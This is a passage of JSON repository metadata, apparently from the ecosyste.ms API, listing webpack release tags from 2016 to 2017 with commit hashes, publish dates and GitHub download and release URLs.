ack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"